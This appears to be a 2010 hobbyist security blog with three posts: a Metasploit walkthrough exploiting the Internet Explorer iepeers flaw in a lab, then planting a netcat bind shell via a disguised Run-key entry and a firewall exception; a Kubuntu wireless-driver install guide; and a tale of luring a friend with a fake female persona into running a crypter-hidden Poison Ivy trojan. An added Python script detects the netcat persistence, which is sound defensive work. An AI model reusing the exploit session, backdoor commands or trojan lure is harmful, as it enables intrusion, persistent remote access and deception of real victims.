Monday, March 22, 2010


Laboratory - Metasploit - Exploit ie_iepeers_pointer Backdoor

On March 10 I got an email from one of the daily lists, reporting the new Internet Explorer 0-day, which targets versions 6 and 7; versions 5 and 8 are not affected. As a countermeasure, those who use IE should migrate fully to version 8. Statistically, out of approximately 100 people, 20 would be using IE versions 6 and 7. I leave a picture.


The BOF is an exploit that attacks the ie_iepeers library and can execute arbitrary code with the privileges of the user running the browser. To use it from Metasploit, first update the framework:
# msfupdate


Starting


This post is in two parts: first the attack with the ie_iepeers exploit, and then uploading netcat and leaving it as a persistent backdoor on the victim.

Tools

As a laboratory I have a Debian 5.0 host system, Windows XP SP3 with Internet Explorer 6.0 running as the guest system, VirtualBox 3.1.4 r57640, and Metasploit Framework version 3.3.4-de.


First Part


Well, loading the parameters is done exactly the way shown in the previous Metasploit post (LINK); I show it all together, from selecting the exploit and setting the variables to launching it.

/home/magnus# msfconsole

msf exploit(ie_iepeers_pointer) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(ie_iepeers_pointer) > set URIPATH /
URIPATH => /
msf exploit(ie_iepeers_pointer) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     192.168.56.1     yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH     /                no        The URI to use for this exploit (default is random)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.56.1     yes       The local address
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

msf exploit(ie_iepeers_pointer) > exploit
[*] Exploit running as background job.
msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.

Note that the attacker has the IP 192.168.56.1. Now it only remains for the victim to enter the address http://192.168.56.1:8080, which serves the malicious page generated by Metasploit; if the exploit's requirements are met, the payload is executed on the victim machine. Then we proceed.



In the Metasploit console we can see how it runs and that we have a Meterpreter session.



msf exploit(ie_iepeers_pointer) >
[*] Started reverse handler on 192.168.56.1:4444
[*] Using URL: http://192.168.56.1:8080/
[*] Server started.
[*] Sending Internet Explorer iepeers.dll Use After Free to 192.168.56.101:1034...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1035)
[*] Session ID 1 (192.168.56.1:4444 -> 192.168.56.101:1035) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1364)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 188
[*] New server process: notepad.exe (188)
msf exploit(ie_iepeers_pointer) > sessions -l

Active sessions
===============

  Id  Type         Information                                 Connection
  --  ----         -----------                                 ----------
  1   meterpreter  VICTIM-55919B2\victima 2 @ VICTIM-55919B2   192.168.56.1:4444 -> 192.168.56.101:1035

msf exploit(ie_iepeers_pointer) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-55919B2
OS      : Windows XP (Build 2600, Service Pack 3).
Arch    : x86
Language: en_US
meterpreter >

Second Part
After obtaining a session, what we do is interact with the victim through Meterpreter. This backdoor process is very simple: it consists of uploading netcat, leaving it listening on a port attached to a cmd.exe, and adding an exception in the firewall, because the connection type will be bind.
Uploading netcat
For this we need netcat for Windows; I have it in my /home/ folder and we will put it in the system32 folder. The command looks like this:


meterpreter > upload /home/magnus/nc.exe c:\\windows\\system32
[*] uploading  : /home/magnus/nc.exe -> c:\\windows\\system32
[*] uploaded   : /home/magnus/nc.exe -> c:\\windows\\system32\\nc.exe

Then we add a registry key so that at Windows boot netcat is started listening on port 1234 with cmd.exe, and with -d so that it runs as a daemon (detached from the console).



meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v realtek -d "C:\\Windows\\System32\\nc.exe -L -d -e cmd.exe -p 1234"
Successful set realtek.

Now we add an exception in the victim's Windows firewall; for this we ask Meterpreter for a shell and run the commands as shown.

meterpreter > execute -f cmd.exe -i -H
Process 560 created.
Channel 3 created.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victima 2\Escritorio>netsh firewall add portopening ALL 1234 "c:\windows\system32\nc.exe" ALL
OK

C:\Documents and Settings\victima 2\Escritorio>netsh firewall show portopening

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
1234   TCP       Enable   c:\windows\system32\nc.exe
1234   UDP       Enable   c:\windows\system32\nc.exe

C:\Documents and Settings\victima 2\Escritorio>^C
Terminate channel 3? [y/N] y
meterpreter > reboot
Rebooting...




The netsh command lets us configure the Windows firewall; what we do is add an exception for the netcat program on port 1234 for both TCP and UDP, and then we can see that the exception is in place with the command netsh firewall show portopening.

We press Ctrl+C, which returns us to Meterpreter, and reboot the victim's computer. Now notice how the victim is listening on port 1234.
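From the defender's side, the two artefacts this backdoor leaves behind (a Run-key value that launches nc.exe with -e cmd.exe, and a firewall portopening for that same port) are easy to hunt for in triage output. The following is an added example, not code from the original post; the Run-key values and the netsh output are constructed here to mirror the session above.

```python
"""Flag netcat bind-shell persistence: a Run-key command that hands cmd.exe
to whoever connects, correlated with a firewall exception on the same port."""
import re

# Constructed sample: values under HKLM\Software\Microsoft\Windows\CurrentVersion\Run
RUN_VALUES = {
    "realtek": r"C:\Windows\System32\nc.exe -L -d -e cmd.exe -p 1234",
    "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe",
}

# Constructed sample: output of `netsh firewall show portopening` after the exception was added
NETSH_OUTPUT = """Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
1234   TCP       Enable   c:\\windows\\system32\\nc.exe
1234   UDP       Enable   c:\\windows\\system32\\nc.exe
"""

# netcat (nc.exe/ncat.exe) whose -e/-c option spawns a shell, plus a listen flag (-l/-L)
SHELL_RE = re.compile(r"(?i)\bnc(?:at)?\.exe\b.*(?:-e|-c)\s*(?:cmd|powershell)(?:\.exe)?")
LISTEN_RE = re.compile(r"(?i)(?:^|\s)-[lL]\b")


def suspicious_run_values(values):
    """Return the Run-key value names whose command starts netcat listening with a shell."""
    return sorted(n for n, cmd in values.items()
                  if SHELL_RE.search(cmd) and LISTEN_RE.search(cmd))


def netcat_port_openings(netsh_text):
    """Parse portopening rows and return (port, protocol) pairs that are enabled for netcat."""
    hits = []
    for line in netsh_text.splitlines():
        m = re.match(r"\s*(\d+)\s+(TCP|UDP)\s+(\w+)\s+(.+?)\s*$", line)
        if m and m.group(3).lower() == "enable" and re.search(r"(?i)nc(?:at)?\.exe", m.group(4)):
            hits.append((int(m.group(1)), m.group(2)))
    return hits


def correlate(values, netsh_text):
    """Return (value name, port) for each shell-binding Run value whose port also has a firewall hole."""
    findings = []
    open_ports = {p for p, _ in netcat_port_openings(netsh_text)}
    for name in suspicious_run_values(values):
        port = re.search(r"-p\s*(\d+)", values[name])
        if port and int(port.group(1)) in open_ports:
            findings.append((name, int(port.group(1))))
    return findings


if __name__ == "__main__":
    print(correlate(RUN_VALUES, NETSH_OUTPUT))  # [('realtek', 1234)]
```

On a live XP host the same two inputs come from `reg query` of the Run key and `netsh firewall show portopening`; the parsing is the same.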







All that is left is to verify it and connect to the victim with netcat, like this.

That's all. Greetings




 

Tuesday, March 16, 2010


Persistent + Kubuntu + wicd + Intel PRO/Wireless 3945ABG





Well, today I was installing Kubuntu 9.10 on my notebook without any problem, up to the point of connecting to the wireless: by default it came with Network-Manager as the administrator of the network connection, and when checking for a network it found none. My wifi card is an Intel PRO/Wireless 3945ABG; the problem was that the wired card wasn't working for me either, it gave me no IP, so my only solution is always the wifi.

A friend told me that he used wicd, so I decided to download it. The issue was that I had no internet, and then I had dependency problems, so I had to go to W$ and download the dependencies, going back and forth many times. Whoever has a similar problem, perhaps this can help; I'll put the list of packages I had to download for wicd to work correctly and run on Kubuntu :).

Steps


Download wicd in .deb format for Ubuntu.

Before installing you have to uninstall Network-Manager:
# aptitude remove network-manager

The following dependencies came up for me:
wicd depends on python-gtk2, but: Package python-gtk2 is not installed.
wicd depends on python-glade2, but: Package python-glade2 is not installed.
wicd depends on python-urwid, but: Package python-urwid is not installed.

Looking at them one by one I ran into some problems, since one package always depends on another and so on, and I had to reboot the PC to go to W$ to search for new packages. So here are the steps until the end, with wicd running smoothly on Kubuntu:
# dpkg -i python-cairo_1.8.6-1ubuntu1_i386.deb
# dpkg -i python-gtk2_2.14.1-1ubuntu1_i386.deb
# dpkg -i libglade2-0_2.6.4-1_i386.deb
# dpkg -i python-glade2_2.14.1-1ubuntu1_i386.deb
# dpkg -i python-urwid_0.9.8.4-1_i386.deb

And finally install wicd the same way with dpkg:
# dpkg -i wicd_1.6.2.2-1_all.deb

That package sequence was what worked for me; you can find most of the other packages here, though you may have to google for a while. LINK. Greetings

Sunday, March 7, 2010


The Danger of Social Engineering

Well, after a while without posting, I'm back with this interesting little topic, which is very broad: Social Engineering.
This attack is as powerful as a 0-day, but let's look a little at what it is, for those who don't know, and at a real case I can show.
The main point of this post is not only to inform but also to alarm, so that after reading it you are not so sure that having all your AV signatures up to date keeps you protected, because on the Internet you don't know who is on the other side of the PC :).

What is Social Engineering?
Social engineering is a technique that tricks a person by pretending to be: a person the victim trusts, a person the victim would like to know, an attractive person, a person important to the victim, or even the victim himself, etc., in order to enter their circle of trust and extract confidential information such as passwords, documents, files, etc.

Starting
I think one of the easiest ways to trick a man is by posing as a girl, a good-looking one, very good-looking :p. The steps are easy: you get photos of a particular girl, a Facebook account and an email. That is the art of deception, so use your imagination! Now we can prepare something like a good trojan (in this example, Poison Ivy) passed through a crypter to make it undetectable; the following pictures show the before and after the crypter.


    Before



After






Now see that the trojan, as is well known, is not detectable by any AV. Now imagine a PC that is supposedly safe because it has AV: the AV is one more tool that has to fit into the whole security process, but it is not the salvation that makes you secure.
Notice the degree of danger: it's not just a matter of seeing the green letters, but that we are unaware of these things, and this is just the tip of the iceberg!
Now our victim, unable to resist with his charm, began to fall for the flirting typical of a teenage girl! (It is worth mentioning that the victim was a friend. Oh, and he never knew about all the work we had behind it; obviously afterwards I told him it was me, eh! I almost lost his friendship! NAAA.. ha!). Let's see the conversation.
I think the picture says it all: access to the machine through a trojan, and the danger this brings of theft of your accounts, your files, all that important PRIVACY; and speaking of privacy, also of what is not ours: my girlfriend, my wife, etc.
As I said earlier, this post is not only a way to report but also to alert and bring you some knowledge, because this can happen to any of us, among other things..!


Finally, here are the 4 items which, according to Kevin Mitnick, make social engineering successful:

1. We all want to help.
2. The first move is always to trust the other.
3. We don't like to say No.
4. We all like to be praised.

Greetings